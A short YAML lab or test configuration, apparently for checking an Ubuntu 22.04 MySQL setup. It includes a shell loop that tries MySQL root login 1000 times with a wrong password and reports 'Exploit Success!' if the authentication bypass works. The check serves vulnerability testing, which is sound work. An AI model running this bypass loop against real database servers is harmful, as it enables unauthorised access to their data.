blueprint: ubuntu2204
ubuntu:
  playbook: ubuntu.yml
  command:
    - "mysql --version"
    - "for i in `seq 1 1000`; do if mysql -uroot -pwrong -h localhost -P3306 --protocol=TCP -e 'SELECT \"Exploit Success!\" as Status;' 2>/dev/null; then break; fi; done"

